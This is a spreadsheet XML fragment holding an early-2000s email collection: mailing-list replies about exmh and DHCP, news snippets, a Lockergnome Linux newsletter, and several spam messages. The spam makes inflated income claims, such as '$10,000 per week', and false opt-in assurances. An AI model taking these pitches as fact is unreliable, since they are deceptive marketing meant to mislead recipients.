  </si>
  <si>
    <t xml:space="preserve">Subject: How I made Edwina tell all
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8418824,215/
 Date: 2002-10-01T04:34:00+01:00
 *Julian Glover*, who worked on John Major's autobiography for two years, on why 
 Edwina Currie wasn't in it.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Too Busy Earning A Living To Make Any Money
</t>
  </si>
  <si>
    <t xml:space="preserve">Do You Want To Teach and Grow Rich?
 If you are a motivated and qualified communicator, I will personally train you to do 3  20 minute presentations per day to qualify prospects that I can provide to you.  We will demonstrate to you that you can make $400 a day part time using this system.  Or, if you have 20 hours per week, as in my case, you can make in excess of $10,000 per week, as I am currently generating (verifiable, by the way).  
 Plus I will introduce you to my mentor who makes well in excess of $1,000,000 annually.
 Many are called, few are chosen.   Make the call and call the 24 hour pre-recorded message number below.  We will take as much or as little time as you need to see if this program is right for you.  
                           ***  801-294-3480  *** 
 Please do not make this call unless you are genuinely money motivated and qualified.  I need people who already have people skills in place and have either made large amounts of money in the past or are ready to generate large amounts of money in the future.  Looking forward to your call.    
                           ***  801-294-3480  *** 
 *To be taken out of this database:
 sonic5@artlover.com
 1139XCyB6-691RCxf9796bQPB2-309RhAl1944TbmA1-318qdJU7208ntpS7-l57
 3472UXYd0-277TKyH6354fhOg1-115qsJM1944hyLU8-546fHtS72l50
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: scan bug: no update after Pick's "New FTOC"
</t>
  </si>
  <si>
    <t xml:space="preserve">--==_Exmh_2077566172P
 Content-Type: text/plain; charset=us-ascii
 &gt; From:  Chris Garrigues &lt;cwg-exmh@DeepEddy.Com&gt;
 &gt; Date:  Thu, 01 Aug 2002 10:01:04 -0500
 &gt;
 &gt; &gt; If you run Pick, and then use the "New FTOC" button to show only
 &gt; &gt; those messages selected by pick, then the ftoc display was considered
 &gt; &gt; "invalid" in the old code.  This prevented the display from being cached,
 &gt; &gt; and it meant that you could get back to the full folder display by
 &gt; &gt; clicking on the folder lablel.  That doesn't work anymore.  You have
 &gt; &gt; to resort to Rescan Folder.  In fact, when you change folders you
 &gt; &gt; continue to have the Pick results, not the new folder contents.
 &gt; &gt; If you go to a any folder and do Rescan, then it heals itself.
 &gt; 
 &gt; Well, that's obviously my fault.  Okay, will look when I get a chance.
 My copy of the tree right now is full of organizational changes in 
 preparation for generalizing the unseen window for display of other 
 sequences, so I'll probably not check in a fix for this until I 
 stabilize that.
 Chris
 -- 
 Chris Garrigues                 http://www.DeepEddy.Com/~cwg/
 virCIO                          http://www.virCIO.Com
 716 Congress, Suite 200
 Austin, TX  78701		+1 512 374 0500
   World War III:  The Wrong-Doers Vs. the Evil-Doers.
 --==_Exmh_2077566172P
 Content-Type: application/pgp-signature
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: Exmh version 2.2_20000822 06/23/2000
 iD8DBQE9SXl0K9b4h5R0IUIRAsr/AJ96ydWWdsjfZ7fqVwq7TJ4ggAvMagCeOV0a
 HEX6F2zWp6uFZMRim5GKcpY=
 =c2hQ
 -----END PGP SIGNATURE-----
 --==_Exmh_2077566172P--
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Attn: NORTON SYSTEMWORKS 2002 CLEARANCE SALE!              VOJTGT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</si>
  <si>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&lt;title&gt;Does Your Computer Need an Oil Change&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;table border=3D"0" width=3D"538" height=3D"1"&gt;
   &lt;tr&gt;
     &lt;td width=3D"538" height=3D"1" align=3D"center" bgcolor=3D"#000000"&gt;&lt;b=
 &gt;&lt;font face=3D"Century Gothic" size=3D"5" color=3D"#FFFFFF"&gt;Does Your Comp=
 uter Need an Oil
       Change?&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table border=3D"0" width=3D"538" height=3D"151"&gt;
   &lt;tr&gt;
     &lt;td width=3D"530" height=3D"145"&gt;&lt;b&gt;&lt;font face=3D"Tahoma" size=3D"5"&gt;N=
 orton&lt;/font&gt;&lt;font color=3D"#006600" face=3D"Verdana" size=3D"7"&gt;&lt;br&gt;&lt;/font=
 &gt;&lt;i&gt;&lt;font face=3D"Verdana" size=3D"7" color=3D"#FF0000"&gt;SystemWorks
       2002&lt;/font&gt;&lt;/i&gt;&lt;font size=3D"4" face=3D"Verdana"&gt;&lt;br&gt; &lt;/font&gt;&lt;font f=
 ace=3D"Tahoma" size=3D"5"&gt;Professional
       Edition&lt;/font&gt; &lt;/b&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table border=3D"0" width=3D"538" height=3D"26"&gt;
   &lt;tr&gt;
     &lt;td width=3D"100%" height=3D"20" align=3D"center" bgcolor=3D"#000000"&gt;=
 &lt;b&gt;&lt;font color=3D"#FFFFFF" face=3D"Century Gothic"&gt;Made
       by the Creators of the #1 Anti-Virus Software on the Market!&lt;/font&gt;&lt;=
 /b&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table border=3D"0" width=3D"538" height=3D"77"&gt;
   &lt;tr&gt;
     &lt;td width=3D"100%" height=3D"71" align=3D"center"&gt;&lt;font face=3D"Tahoma=
 "&gt;&lt;b&gt;&lt;font color=3D"#CC0000"&gt;This
       &lt;u&gt;UNBEATABLE&lt;/u&gt; software suite comes with &lt;i&gt; EVERY&lt;/i&gt;
       program you'll &lt;/font&gt;&lt;font face=3D"Lucida Sans Unicode" color=3D"#F=
 F0000"&gt; ever&lt;/font&gt;&lt;font color=3D"#CC0000"&gt; need to answer the problems or=
  threats that your
       computer faces each day of it's Life!&lt;br&gt;&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;font fac=
 e=3D"Lucida Sans Unicode" color=3D"#CC0000"&gt; &lt;br&gt;&lt;/font&gt;&lt;font face=3D"Taho=
 ma" color=3D"#000000"&gt;&lt;b&gt;Included in this magnificent deal
       are the following programs:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table border=3D"0" width=3D"538" height=3D"138"&gt;
   &lt;tr&gt;
     &lt;td width=3D"100%" height=3D"132" bgcolor=3D"#000000"&gt;&lt;font color=3D"#=
 FFFFFF"&gt;&lt;font size=3D"4" face=3D"Tahoma"&gt;Norton
       AntiVirus=FFFFFF99 2002 - &lt;/font&gt;&lt;font face=3D"Tahoma" size=3D"2"&gt;&lt;b=
 &gt;THE #1
       ANTI-VIRUS PROTECION EVER!&lt;/b&gt;&lt;/font&gt;&lt;font size=3D"4" face=3D"Tahoma=
 "&gt;&lt;br&gt;Norton Utilities=FFFFFF99 2002
       - &lt;/font&gt;&lt;font face=3D"Tahoma" size=3D"2"&gt;&lt;b&gt;DIAGNOSE ANY PROBLEM WI=
 TH YOUR
       SYSTEM!&lt;/b&gt;&lt;/font&gt;&lt;font size=3D"4" face=3D"Tahoma"&gt;&lt;br&gt;
       &lt;font size=3D"4"&gt;Norton Ghost=FFFFFF99 2002 - &lt;/font&gt;&lt;/font&gt;&lt;font fa=
 ce=3D"Tahoma" size=3D"2"&gt;&lt;b&gt;MAKES
       BACKING UP YOUR VALUABLE DATA EASY!&lt;/b&gt;&lt;/font&gt;&lt;font size=3D"4" face=3D=
 "Tahoma"&gt;&lt;br&gt;
       Norton CleanSweep=FFFFFF99 2002 - &lt;/font&gt;&lt;font face=3D"Tahoma" size=3D=
 "2"&gt;&lt;b&gt;CLEANS
       OUT EXCESS INTERNET FILE BUILDUP!&lt;/b&gt;&lt;/font&gt;&lt;font size=3D"4" face=3D=
 "Tahoma"&gt;&lt;br&gt;
       Norton WinFax=FFFFFF99 Basic - &lt;/font&gt;&lt;font face=3D"Tahoma" size=3D"=
 2"&gt;&lt;b&gt;TURNS YOUR
       CPU INTO A FAX MACHINE!&lt;/b&gt;&lt;/font&gt;&lt;font size=3D"4" face=3D"Trebuchet=
  MS"&gt;&lt;br&gt;
       &lt;/font&gt;
       &lt;font size=3D"4" face=3D"Tahoma"&gt;GoBack=FFFFFFAE 3 Personal - &lt;/font=
 &gt;&lt;b&gt;&lt;font face=3D"Tahoma" size=3D"2"&gt;HELPS
       PREVENT YOU FROM MAKING ANY MISTAKES!&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table border=3D"0" width=3D"538" height=3D"63"&gt;
   &lt;tr&gt;
     &lt;td width=3D"100%" height=3D"57" align=3D"center"&gt;&lt;b&gt;&lt;font face=3D"Ver=
 dana" size=3D"4" color=3D"#800000"&gt;*ALL
       this has a retail price of $99.95*&lt;/font&gt;&lt;font face=3D"Verdana" size=
 =3D"5" color=3D"#FF0000"&gt;&lt;BR&gt; &lt;/font&gt;&lt;font face=3D"Verdana" color=3D"#FF00=
 00" size=3D"6"&gt; Buy
       it
       Now for ONLY $29.99!&lt;/font&gt;&lt;font face=3D"Verdana" size=3D"5" color=3D=
 "#FF0000"&gt;&lt;br&gt;&lt;/font&gt;&lt;font face=3D"Verdana" color=3D"#666666" size=3D"5"&gt;&lt;=
 i&gt;with
       Free Shipping - PLUS,&lt;br&gt; &lt;/i&gt;&lt;/font&gt;&lt;i&gt;&lt;font face=3D"Verdana" size=3D=
 "6" color=3D"#CC0000"&gt;Buy
       Any 2 Items &amp;amp; GET 1 FREE! &lt;/font&gt;&lt;/i&gt;&lt;font face=3D"Verdana" colo=
 r=3D"#666666" size=3D"5"&gt;&lt;i&gt;(Also
       w/Free Shipping!) &lt;/i&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table border=3D"1" width=3D"538" height=3D"60" bgcolor=3D"#333333"&gt;
   &lt;tr&gt;
     &lt;td width=3D"100%" height=3D"54" align=3D"center" bgcolor=3D"#CC0000"&gt;=
 &lt;font size=3D"6" color=3D"#FFFFFF" face=3D"Impact"&gt;&lt;a href=3D"http://www.a=
 nythinggoeshere.com/" style=3D"color: #FFFFFF"&gt;CLICK
       HERE to Order NOW!&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;p&gt;&lt;font color=3D"#000000" face=3D"System"&gt;This Product is available NOW. =
 When we
 run out it's gone, so get it while it's HOT!&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;table border=3D"1" width=3D"538" height=3D"61" bordercolorlight=3D"#66666=
 6" bordercolordark=3D"#333333"&gt;
   &lt;tr&gt;
     &lt;td width=3D"100%" height=3D"55" align=3D"center"&gt;&lt;font size=3D"2"&gt;&lt;fo=
 nt face=3D"Tahoma" color=3D"#666666"&gt;Your
       email address was obtained from an opt-in list. Opt-in IAA (Internet
       Advertising Association)&amp;nbsp;Approved&lt;/font&gt; &lt;font face=3D"Tahoma" =
 size=3D"1" color=3D"#666666"&gt;List&amp;nbsp;Serial
       Code FTRD4451.&amp;nbsp;&amp;nbsp;If you wish to be unsubscribed from
       this list, please &lt;a style=3D"color: #800000" href=3D"http://www.any=
 thinggoeshere.com/remove.asp"&gt;Click
       here&lt;/a&gt;. We do not condone spam in any shape or form. Thank You kin=
 dly
       for your cooperation.&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: FORD MOTOR SALUTES ARMED SERVICES - Please Review
</t>
  </si>
  <si>
    <t xml:space="preserve">FORD SALUTES THE MILITARY.
 THIS OFFER IS EXTENDED EXCLUSIVELY TO ALL ACTIVE DUTY, RESERVE, RETIRED, MILITARY VETERANS AND THEIR DIRECT DEPENDANTS ONLY.
 ** DELIVERY TO ANY MILITARY INSTALLATION OR THE CLOSEST PORT IS AVAILABLE. **
 ROLLING HILLS FORD, Inc. LOCATED IN CLERMONT, FLORIDA, IS OFFERING DURING THE MONTHS OF AUGUST AND SEPTEMBER 2002, A PERSONAL INVITATION.  
 FOR A LIMITED TIME, A SPECIALTY PERIOD SALES PROGRAM FOR THE ABOVE MENTIONED, WILL BE OFFERED, *UNADVERTISED TO THE GENERAL PUBLIC.*
 CURRENT FORD INCENTIVES ARE ALSO HONORED *IN ADDITION* TO THIS MILITARY PROGRAM, INCLUDING REBATES UP TO $3000 DOLLARS OR 0.0% FINANCING ON SELECT VEHICLES.
 THIS OFFER INCLUDES PRE-OWNED VEHICLES.
 SPECIAL CREDIT SITUATIONS WILL BE GERNEROUSLY REVIEWED BY OUR FINANCE DIRECTORS.
 CONFORMATION CODE - MILITARY: 009AAKKY1109
 THIS CODE MUST BE PRESENTED TO QUALIFY.
 EMAIL FOR DETAILS:
 davidm@rollinghillsford.com
 OR CALL FOR DETAILS:
 (352) 394-6161 , ext 1051
 David Mitchell, I.T. Department
 davidm@rollinghillsford.com
 (352) 394 - 6161 EXT 1015
 Rolling Hills Ford
 Clermont Florida 
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;&lt;!--
       CLICK HERE to read this newsletter on the Web for FREE:
       &lt;a href="http://www.lockergnome.com/issues/penguinshell/20020717.html"&gt;
       http://www.lockergnome.com/issues/penguinshell/20020717.html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&lt;/style&gt;&lt;title&gt;20020717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07.17.2002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I've very excited about the in-planning Penguin Shell volunteer project. 
 Apparently, you are too. I've received more than 100 emails from readers &lt;a 
 href="mailto:tony@lockergnome.com?subject=Penguin Shell Volunteer 
 Skills"&gt;volunteering&lt;/a&gt; a wide range of IT skills for charitable organizations. 
 Linux users, Windows users, even a few Mac users are ready, willing and able to 
 spend their own precious off time providing qualified technical skills for a 
 good cause. I've also gotten more than two dozen suggestions for &lt;a 
 href="mailto:tony@lockergnome.com?subject=Penguin Shell Organization 
 Suggestion"&gt;organizations&lt;/a&gt; that might be in need of such skills. And, I've 
 seen some very interesting suggestions for &lt;a 
 href="mailto:tony@Lockergnome.com?subject=Penguin Shell Volunteer name 
 suggestion"&gt;names&lt;/a&gt; for our project. Feel free to click through on any of the 
 above links to join the ever-growing bandwagon. Do me a favor, though. keep the 
 subject lines intact. It's the only way your messages will filter and sort 
 through my email system.&lt;p&gt;
 It looks like Apple may have crossed a line of irritation with its users. 
 According to &lt;a href="http://theregister.co.uk/content/4/26269.html" 
 target="_blank"&gt;this&lt;/a&gt; article on &lt;a href="http://theregister.co.uk/" 
 target="_blank"&gt;The Register&lt;/a&gt;, Apple has tacked a $100 annual fee on its
 previously free mac.com email service. It's also set the price for an OS 10.2
 upgrade at $129.&lt;p&gt;
 I won't question Apple's decision too much. Instead, it really proves how 
 difficult things have become in the tech world in the past few years. Revenues, 
 by and large, are still decreasing from the pie-in-the-sky late 90s and early 
 2000. That's left companies to scramble for new sources of income, some of which 
 were previously free. Even we at Lockergnome have felt the pinch in the past few 
 years. Never fear, though. Chris has assured us that the newsletters will remain 
 free. We have, however, begun to explore alternative income &lt;a 
 href="http://www.gnometomes.com/" target="_blank"&gt;sources&lt;/a&gt;.&lt;p&gt;
 On a brighter note, it looks like &lt;a href="http://www.mandrake.com/" 
 target="_blank"&gt;Mandrake&lt;/a&gt; has found a sweet spot. According to their most 
 recent shareholder's report, the third quarter was the strongest in the 
 company's
 history, with 1.6 million Euro (1.61 million US) in revenue. That doesn't put
 them in the black, though. According to MandrakeSoft, the strong quarter will
 only decrease operating losses. I have to wonder how much of this revenue was
 the result of the &lt;a
 href="http://mandrakelinux.com/en/club/"target="_blank"&gt;Mandrake Linux User's
 Club&lt;/a&gt;.&lt;p&gt;
 The news also makes me want to pay a bit more attention to Mandrake's newest
 partnership venture, an agreement with &lt;a href="http://www.microtel.com/"
 target="_blank"&gt;Microtel&lt;/a&gt; to provide Mandrake-loaded computers for sale on &lt;a
 href="http://www.walmart.com/catalog/product_listing.gsp?cat=102252&amp;dept=3944&amp;path=0%3A3944%3A3951%3A41937%3A86796%3A102252" target="_blank"&gt;WalMart.com&lt;/a&gt;.
 I would never have guessed that WalMart would lead the consumer Linux machine
 charge. They've had Mandrake boxes available for several months. Now, with the 
 addition of both &lt;a href="http://www/lindows.com/" target="_blank"&gt;Lindows&lt;/a&gt; 
 and Mandrake-equipped computers, they seem surprisingly ahead of the retail 
 computer pack. Let's hope for the best for all involved.&lt;p&gt;
 Have a great Wednesday.&lt;p&gt;&lt;p&gt;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&lt;b&gt;Checking Mail With KMail&lt;/b&gt;&lt;p&gt;
 I've recently become a KDE convert - impressed enough with KDE-3 to move me from 
 my longtime desktop friend Gnome. While I use a combination of fetchmail, 
 procmail and pine for reading and filtering my email, KMail is a strong 
 contender in the email race. As you'd guess, it's fully integrated into the KDE 
 desktop, ready for a quick setup and easy use.&lt;p&gt;
 There's one drawback to KMail, though, in my opionion. That's that it doesn't 
 automatically check your email by default when the program is opened. As much 
 time as I spend talking about saving key and mouse strokes, you knew the 
 additional step to check your email after opening the program would be an 
 irritation to this Penguin. However, changing the problem is a quick and simple 
 configuration issue.&lt;p&gt;
 To force KMail to check your email when opened, right-click on the KMail icon in 
 your KDE panel. Select "Preferences" and the "Execute" tab. In the Execute 
 window, change the command line to read:&lt;p&gt;
 &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;kmail --check -caption "%c" %i %m&lt;p&gt;
 The addition of the --check option will force KMail to bring you your mail when 
 you open the program.&lt;p&gt;
 Fewer keystrokes make a happy geek, right?&lt;p&gt; &lt;p&gt;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XIII&lt;/b&gt;&lt;p&gt;
 As you well know, Linux is simply the most robust operating system for 
 networking around. With its roots squarely in the network, Linux has managed to 
 stay ahead of the pack in virtually every respect related to networks. It should 
 come as little suprise, then, that the network section of your Linux kernel 
 configuration is dense with details and options.&lt;p&gt;
 I will say that I warned you on Monday - there are going to be some sections of 
 the kernel configuration series where I just can't give you a stock 
 configuration that will work in every case. Networking is one of those areas. 
 You're going to have to give some thought as to how your network is or will be 
 used and the level of security you want to provide (both internal and external). 
 Then, it's a matter of finding the solutions to those options.&lt;p&gt;
 For security issues, I can recommend several good articles and HowTos:&lt;p&gt;
 &lt;a class="url" 
 href="http://www.linux.org/docs/ldp/howto/Security-Quickstart-HOWTO/index.html"&gt;The Linux Security Quickstart HowTo&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&amp;nbsp;covers security on a high level, with a good discussion of kernel 
 configuration issues&lt;p&gt;
 &lt;a class="url" href="http://www.linuxplanet.com/linuxplanet/tutorials/211/1/" 
 target="_blank"&gt;Linux Network Security from Linux Planet&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&amp;nbsp;a nice tutorial on network security&lt;p&gt;
 &lt;a class="url" href="http://www.linuxgazette.com/issue77/lechnyr.html" 
 target="_blank"&gt;Network Security with /proc/sys/net/ipv4&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&amp;nbsp;other approaches to network security&lt;p&gt;
 These should get you started. Tomorrow, we'll cover telephony support in your 
 Linux kernel.&lt;p&gt;&lt;p&gt;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&lt;b&gt;PyMP3Cut&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href=""&gt;&lt;/a&gt;&lt;br&gt;
 &lt;a class="url" 
 href="http://www.librelogiciel.com/software/PyMP3Cut/"&gt;http://www.librelogiciel.com/software/PyMP3Cut/&lt;/a&gt;&lt;p&gt;
 "PyMP3Cut is a Python commandline tool designed to cut huge (&gt; 100MB) MP3 files 
 at high speed without requiring the extra disk space and processing time usually 
 needed by visual audio editing tools, which convert the MP3 format to more 
 easily manageable formats like WAV before doing anything. It reads and cuts 
 simultaneously according to the autodetected MP3 frame rate and a timeline 
 passed as a commandline argument."&lt;p&gt;&lt;p&gt;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&lt;b&gt;More Windows for Linux&lt;/b&gt;&lt;br&gt;
 &lt;span class="url"&gt;Scribbled by Ken Knull&lt;/span&gt;&lt;p&gt;
 "I'm reading your Codeweavers/CrossOver project stuff, and have comments
 on another option I use.&lt;p&gt;
 "I have been using Win4Lin ( &lt;a href="http://www.netraverse.com/" 
 target="_blank"&gt;http://www.netraverse.com/&lt;/a&gt; ) for several
 months now, on an i686 boxen which runs RH 7.2, and now also
 most windoze (nonXP / NTFS apps).&lt;p&gt;
 "I love it, and highly recommend it, and if you'd like more details /
 data let me know."&lt;p&gt;&lt;p&gt;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&lt;b&gt;Linux PR&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href="http://linuxpr.com/"&gt;http://linuxpr.com/&lt;/a&gt;&lt;p&gt;
 If the daily Linux news sites are starting to get you down, maybe it's time for 
 a change. Linux PR is an up-to-the-minute listing of events and developments in 
 the Linux world. The layout is attractive, with all the most recent articles in 
 descending order on the front page. It makes quick scans easy. The only real 
 downside to the news on the site is that some of it is very, very 
 company-oriented - clearly the work of PR firms cranking out press releases. 
 Other than that, Linux PR is a useful site for checking in and keeping up on 
 your favorite OS.&lt;p&gt;&lt;p&gt;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href="http://www.lockergnome.com/issues/penguinshell/20020717.html"&gt;http://www.lockergnome.com/issues/penguinshell/20020717.html&lt;/a&gt;
 &lt;p&gt;Your subscribed e-mail address is: [qqqqqqqqqq-lg@spamassassin.taint.org]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</si>
  <si>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Subject: Re: [ILUG] DHCP
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt; Quoting Paul O'Neil &lt;poneil@dbiassociates.net&gt;:
 &gt; 
 &gt; &gt; Excuse me for asking an old question here but Ive been running SuSE 
 with a
 &gt; &gt; cable modem for a couple months. About 5-6 weeks ago the internet 
 access
 &gt; &gt; was
 &gt; &gt; not working and I rebooted noticing I came up with a new IP 
 address, and it
 &gt; &gt; worked fine. How does it work exactly when the cable company 
 releases and
 &gt; &gt; renews an ip address. Do they merely setup their system to issue 
 new ip
 &gt; &gt; addresses when cusomters reboot their computer or does it take 
 affect
 &gt; &gt; immediately and it caused the internet disruption that required a 
 reboot or
 &gt; &gt; at least a network reload? If so, can this be detected 
 automatically and
 &gt; &gt; taken care of or is that just how it works?
 &gt; 
 &gt; A DHCP client daemon (dhcpcd, pump) can do this automatically.  Some 
 cable
 &gt; companies apparently reassign the same address over and over when the 
 leases run
 &gt; out, so you get away without a daemon for long enough to make you 
 think you
 &gt; don't need one. :-)
 &gt; 
 &gt; Ronan
 &gt; 
 &gt; 
 Is what your talking about, this process is running all the time. 
 root       422  0.0  0.4  1332  500 ?        S    03:18   
 0:00 /sbin/dhcpcd -D -N -Y -t 999999 -h cable-modem-1 eth0
 If alright then maybe coincidence, I'll wait and see when I get another 
 address.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: The Blair message: be bold
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8456083,215/
 Date: 2002-10-02T03:57:02+01:00
 Time to transform post-war 'one size fits all' public services, urges PM.
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt;&gt;&gt;&gt;&gt; On Fri, 13 Sep 2002, "Tony" == Tony Nugent wrote:
   Tony&gt; (In essence: is there a way to mark a destination folder
   Tony&gt; for a message link or move without actually doing a move
   Tony&gt; or link, I couldn't see anything obvious).
 1) Right click on the folder label in the folder list
 2) In the main window, the "+" key puts you into a "change 
    folder" mode (the first time you use it after starting exmh),
    hit a second + and you go to "set a target" mode.  Type a few
    characters of the folder name and hit space for autocomplete.
 --Hal
 How's spring shaping up "down under"?
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Your Membership Community &amp; Commentary, 07-27-01
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --261908501.996294421526.JavaMail.RovAdmin.rovweb003
 Content-Type: text/plain; charset=iso-8859-1
 Your Membership Community &amp; Commentary (July 27, 2001)
 It's All About Making Money
 Information to provide you with the absolute 
 best low and no cost ways of providing traffic 
 to your site, helping you to capitalize on the power 
 and potential the web brings to every Net-Preneur. 
 --- This Issue Contains Sites Who Will Trade Links With You! --- 
 -------------
 IN THIS ISSUE
 -------------
 5 Ways to Create a Unique Website
 Member Showcase
 Commentary Quick Tips
 Win A FREE Ad In Community &amp; Commentary
 ||| =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=&gt;&gt;
     Today's Special Announcement:
 ||| =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=&gt;&gt;
 Absolute Gifts Etc. Offers thousand of high quality gifts &amp; unique 
 collectibles. At wholesales prices, Some items are "Exclusive" and 
 were designed for our collection only. Lots of freebees! 
 Plus bonus bucks will save you even more. 
 Business opportunities,Total weight loss system &amp; much more!
 http://www.absolutegiftsetc.com 
 ||| =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=&gt;&gt;
 You are a member in at least one of these programs 
 - You should be in them all! 
 http://www.BannersGoMLM.com 
 http://www.ProfitBanners.com 
 http://www.CashPromotions.com 
 http://www.MySiteInc.com 
 http://www.TimsHomeTownStories.com 
 http://www.FreeLinksNetwork.com 
 http://www.MyShoppingPlace.com 
 http://www.BannerCo-op.com 
 http://www.PutPEEL.com 
 http://www.PutPEEL.net 
 http://www.SELLinternetACCESS.com 
 http://www.Be-Your-Own-ISP.com 
 http://www.SeventhPower.com 
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 5 Ways to Create a Unique Website
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 Internet users have no doubt seen several websites of identical
 design. This is often because webmasters do not have the
 ability or time to design and create unique websites. These
 five points will help you come up with a one-of-a-kind design
 for your website.
 1. Navigation System
 Deciding on a navigation system should be one of the first
 things to consider when designing your website. Visitors
 usually look for a way to get to the information they want
 before reading anything else. I would suggest putting your
 navigation system in two areas. Look at WebmasterBase 
 (http://www.webmasterbase.com) for example. There is a list 
 of categories on the left, and information about the network 
 on the top bar.
 It is not recommended that you place your navigation at the
 bottom of the page because:
 - People see the top of the page first
 - If you have a lot of content on one page, the navigation gets
    pushed to bottom of the page... away from the visitor.
 2. Color Scheme
 When you are choosing colors, make sure they contrast. For
 example, do not use bright green and florescent pink. Some
 colors that are often used are white on black or black on
 white.
 A wonderful utility that is web-based and free is Color Schemer
 (http://www.godigitalstudios.com/www/color/), created by Aaron
 Epstein. Many other programs exist that can assist you in
 choosing colors. Try doing a search on FreewareFiles 
 (http://www.freewarefiles.com), Tucows (http://www.tucows.com),
 or Download.com (http://www.download.com) for "color schemer."
 3. Content Window
 This is the brain of the website. Make sure that the text here
 is easy to read and understand.
 Also, provide your own original content. People do not want to
 hear what somebody else has to say. They want to hear what 
 you want to say! While it might be time consuming to write
 your own content, it sure is worth it.
 To find content for your website, try searching at
 EzineArticles (http://www.ezinearticles.com). Other people may
 have used the articles, but if you become good friends with the
 authors, they may send you new content as they write it. Be
 careful though. Do not use too much content from other 
 authors, as mentioned above.
 4. Font(s)
 Several types of fonts exist. The first one I will discuss is
 fixed width or monospace, similar to Courier or Courier New.
 Fixed width fonts are good for displaying code (like HTML.)
 Another type of font is called sans serif. It is similar to
 Arial (Windows) or Helvetica (Macintosh). This font can be 
 used for long pieces of text.
 The final type of font is called serif because it has serifs,
 or curves, in each letter. Often, this font is called Times
 (Windows) or Georgia (Macintosh). This font, like sans serif,
 is often used for long blocks of text. It is preferred because
 its rounded edges lead the reader to the next letter, making it
 easier to read.
 5. Advertising
 Ah, everybody's favorite... advertising! This is one of thing 
 that almost every website has. The most common type is what 
 is known as "banner" advertising. It is called that because it is 
 long and thin (like a paper banner.) How long you ask? The 
 generic kind is 468 pixels wide by 60 pixels high.
 New sizes however are being used. Take for example the new
 style called "skyscraper" -- so called for a reason: it looks
 like a skyscraper. It is tall (about 425 pixels) but not too
 wide (about 100-125 pixels.)
 Finding a way to place advertising can be tricky. Banners 
 used to be placed (and still are) only at the top of the page.
 Nevertheless, banners are starting to be placed in the middle
 of the page, at the bottom, or along the side.
     Conclusion
 These are only five things to consider when designing a
 website. There are many others however. Let me know what 
 you find that helps you create a unique website. My email 
 address is mailto:corbb@justforwebmasters.com.
 -------------------------------------
 About the Author...
 Written by Corbb O'Connor. Corbb is the Webmaster of
 http://www.justforwebmasters.com, a website that focuses on
 teaching Webmasters how to create, gain traffic to, and make
 money from their own websites. He is also the editor of a FREE
 bi-weekly newsletter entitled, "The Guided Webmaster." To
 subscribe now, send an email to:
 mailto:subscribe@justforwebmasters.com?subject=article-subscribe. 
 Information about this newsletter can be obtained from his website.
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 Member Showcase
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 Examine carefully - Those with email addresses included WILL 
 TRADE LINKS with you... You are encouraged to contact them. 
 There Are Many Ways To Build A Successful Business - Just look 
 at these successful sites &amp; programs other members are involved 
 in...
 -------------------------------------------------
 Life Without Debt! What would you do with 5,000 10,000 
 20,000 100,000? A "Dream Team" of heavy hitters are 
 gathering to promote Life Without Debt. Get in NOW to 
 receive Massive spillover in the 2x matrix. 
 http://trafficentral.com/lwd/index.htm
 ---------------------------------------------------------------------
 EARN $100,000+ PER YEAR! - FULLY GUARANTEED!
 We do all the selling for you, 365 days a year! 
 We also offer you a GUARANTEED INCOME of up to 
